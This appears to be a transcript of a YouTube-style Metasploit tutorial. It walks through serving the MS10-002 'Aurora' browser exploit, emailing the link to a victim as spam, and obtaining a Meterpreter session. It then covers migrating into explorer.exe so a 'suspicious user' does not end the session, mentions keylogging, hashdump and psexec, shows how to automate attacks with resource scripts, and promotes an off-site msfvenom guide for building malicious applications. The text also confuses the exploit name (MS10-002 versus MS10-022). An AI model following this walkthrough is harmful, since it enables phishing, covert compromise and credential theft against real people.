msf6 exploit(windows/browser/ms10_002_aurora) > [*] Using URL: http://0.0.0.0:8080/SCHcjgf4
[*] Local IP: http://192.168.43.71:8080/SCHcjgf4
[*] Server started.
Let’s see what happens when a workstation missing Microsoft security update MS10-002 visits the malicious web page and clicks through the prompts:
I just send a spam mail to the victim. So I open my browser and open this site. From here I will send an e-mail to the victim.
When the victim found the mail and click that link. When The victim clicks the link, you got the session:
The usage of meterpreter is not similar to other payloads.
Penetration Testing with Metasploit's Meterpreter
Having a command prompt is great. However, often it would be
convenient to have more flexibility after you've compromised a host. And in
some situations, you need to be so sneaky that even creating a new process on a
host might be too much noise that's where the Meterpreter payload shines!
The Metasploit Meterpreter is a command interpreter payload
that is injected into the memory of the exploited process and provides
extensive and extendable features to the attacker. This payload never actually
hits the disk on the victim host everything is injected into process memory
with no additional process created It also provides a consistent feature set no
matter which platform is being exploited. The Meterpreter is even extensible,
allowing you to load new features on the fly by uploading DLLs to the target
system's memory.
To introduce the Meterpreter, we'll reuse the MS10-022
browser-based exploit with the Meterpreter payload rather than the reverse
shell payload.
The exploit worked again. Let's check our session listing.
We now have two command shells from previous examples and
one new Meterpreter session. Let's interact with the Meterpreter session.
The help command will list all the built-in Meterpreter
commands. The entire command list would fill several pages, but here are some
of the highlights.
Let's start with the ps and migrate commands Remember that
the Meterpreter payload typically runs within the process that has been
exploited (Meterpreter paired with the MS 10-002 is a bit of a special case) So
as soon as the user closes that web browser the session is gone in the case of
these client-side exploits especially, you'll want to move the Meterpreter out
of the client-side application's process space and into a process that will be
around longer A good target is the user's explorer.exe process. “Explorer.exe”
is the process that manages the desktop and shell, so as long as the user is
logged in explorer.exe should remain alive. In the following example, we'll use
the ps command to list all running processes and the migrate command to migrate
the Meterpreter over to “explorer.exe”.
Great, now our session is less likely to be terminated by a
suspicious user.
When pen-testing your goals will often be to elevate
privileges, establish a stronger foothold, and expand access to other machines.
In this demo example, so far we have a Meterpreter session running as TS-1B7F08B5B4BA
slash TS. This local workstation account is better than nothing, but it won't
allow us to expand access to other machines.
There are a few other ways to explore the meterpreter
session. Using meterpreter, you can log keystrokes, or run code as a different
logged-on user, or use Meterpreter’s hashdump command and Metasploit’s psexec
Command to Log In using a Shared password. I cannot explore all these here.
If you want to learn more about meterpreter, raise your hand and write me yes in
my comment section.
There is a tool called MSF venom, that is used to generate a
malicious application, that is used to exploit any device without having a
vulnerability.
Due to community guidelines, I cannot teach you on YouTube.
But don’t worry, I already have a tutorial for the usage of MSF Venom, find them
by visiting my website, the link is in my description.
Using these two videos you will learn how to build a
malicious application.
If you have any doubts or queries on my video write me
below in my comment section.
Automating and Scripting Metasploit
The examples we have shown so far have all required a human at the keyboard to launch the exploit and, similarly, a human typing in each post-exploitation command. On larger scale penetration test engagements, that would, at best, be monotonous or worse, cause you to miss exploitation opportunities, because you were not available to immediately type in the necessary commands to capture the session.Thankfully, Metasploit offers functionality to automate post-exploitation and even build your own scripts to run when on each compromised session. Let's start with an example of creating an automated script and running it.
From here we have to generate an automated script. So from here open a new terminal window. I want the script live on my desktop, so let me change the directory. Ok, next is to push the all used commands to gain access to the Windows XP. Now run nano along with the file name. Always remember the file name must be in “.rc” format.
To run the script use the resource command, and then paste the file.
As here you see it automatically runs each of the commands. Otherwise, you can run it directly from the new terminal window using the “MSF console hyphen r and the file”.
You can find all the available Meterpreter scripts in your Metasploit installation under user, share, Metasploit–framework, here click on scripts and then click on meterpreter. These all scripts are written in Ruby.
Let me open a script just to show you all, what is in a script.
Going Further with Metasploit
There are a few other ways to exploit a device. The simplest and easiest step is MSF Venom.Few other videos will explore the Metasploit Framework. Watch these videos from my blog, the link is in my description. It’s time to say goodbye. If you have any doubts or queries about my videos write me below in my comment section.
